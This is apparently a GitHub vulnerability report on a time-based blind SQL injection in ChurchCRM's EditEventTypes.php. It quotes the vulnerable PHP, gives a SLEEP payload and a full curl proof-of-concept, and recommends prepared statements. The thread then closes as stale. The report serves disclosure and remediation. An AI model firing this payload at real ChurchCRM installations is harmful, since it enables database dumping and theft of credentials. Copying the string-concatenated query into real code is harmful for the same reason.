Bug: (CVE-2025-1023) - SQL Injection in newCountName Parameter via EditEventTypes.php

[PenTeZtZMicZ]

Severity:

⚫ Critical (CWE-89: Improper Neutralization of Special Elements used in an SQL Command)

• A CVE will be assigned once the ChurchCRM team reviews the issue (CVE-2025-1023)

Authorization Required

• Administrator or a user with permission to list event types

Description

A vulnerability exists in ChurchCRM that allows an attacker to execute arbitrary SQL queries by exploiting a time-based blind SQL Injection vulnerability in the EditEventTypes functionality. The newCountName parameter is directly concatenated into an SQL query without proper sanitization, allowing an attacker to manipulate database queries and execute arbitrary commands, potentially leading to data exfiltration, modification, or deletion.

Exploiting the SQL Injection

Affected Asset:

• http://<server_ip>/EditEventTypes.php

Vulnerable Source Code:

ctid = mb_substr($_POST['Action'], 7);
    $sSQL = "DELETE FROM eventcountnames_evctnm WHERE evctnm_countid='$ctid' LIMIT 1";
    RunQuery($sSQL);
} else {
    switch ($_POST['Action']) {
        case 'ADD':
            $newCTName = $_POST['newCountName'];
            $theID = $_POST['EN_tyid'];
            $sSQL = "INSERT eventcountnames_evctnm (evctnm_eventtypeid, evctnm_countname) VALUES ('$theID','$newCTName')";
            RunQuery($sSQL);
            break;

Steps to Reproduce:

1. Navigate to the EditEventTypes endpoint: http://<server_ip>/EditEventTypes.php
2. Intercept the request using a tool like Burp Suite or manually craft a request.
3. Modify the newCountName parameter with the following SQL Injection payload:

   4' AND (SELECT 6419 FROM (SELECT(SLEEP(5)))PYsF) AND 'KmGS'='KmGS

4. Observe the response time delay, indicating that SQL Injection is possible.

Proof of Concept (PoC):

Exploiting Time-Based Blind SQL Injection

curl --path-as-is -i -s -k -X $'POST' \
    -H $'Host: <server_ip>' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36' \
    -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' \
    -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' \
    -H $'Content-Type: application/x-www-form-urlencoded' \
    -H $'Content-Length: 175' -H $'Origin: http://<server_ip>' -H $'Connection: keep-alive' \
    -H $'Referer: http://<server_ip>/EditEventTypes.php' \
    -H $'sec-ch-ua-platform: "Windows"' -H $'sec-ch-ua: "Google Chrome";v="117", "Chromium";v="117", "Not=A?Brand";v="24"' \
    -H $'sec-ch-ua-mobile: ?0' -H $'Priority: u=0' \
    -b $'<CRM-Cookie>' \
    --data-binary $'EN_tyid=1&EN_ctid=&newEvtName=Church%20Service&newEvtStartTime=10:30:00&newCountName=4\'%20AND%20(SELECT%206419%20FROM%20(SELECT(SLEEP(5)))PYsF)%20AND%20\'KmGS\'\=\'KmGS&Action=ADD' \
    $'http://<server_ip>/EditEventTypes.php'

Observed Response:

• The request results in a 5-second delay, confirming the SQL Injection vulnerability.

---

Impact:

• Data Exfiltration: Attackers can dump the database and retrieve sensitive data, such as user credentials and admin tokens.
• Database Manipulation: Attackers can modify, delete, or corrupt important data.
• Remote Code Execution (RCE) Possibility: Depending on the database configuration, this vulnerability could lead to RCE by leveraging database functions to execute OS-level commands.

Recommended Fix:

• Use prepared statements (parameterized queries) to prevent SQL Injection. Example:

  $stmt = $pdo->prepare("INSERT INTO eventcountnames_evctnm (evctnm_eventtypeid, evctnm_countname) VALUES (?, ?)");
  $stmt->execute([$theID, $newCTName]);

• Implement input validation to reject dangerous characters.
• Apply principle of least privilege to database users to limit damage from SQL Injection.
• Adding Data Type Assignment in PHP for the newCountName variable. E.g. if it is a name, change it to Int

Environment:

• Application: ChurchCRM 5.13.0
• Tested on: Provided Docker in release

[DawoudIO]

Let me take a look this week

[PenTeZtZMicZ]

I forgot to include, but I went beyond a sleep SQLi test and dumped the database from the SQLi

[github-actions]

This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.

[github-actions]

This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.

[github-actions]

This issue was closed because it has been stalled for 15 days with no activity.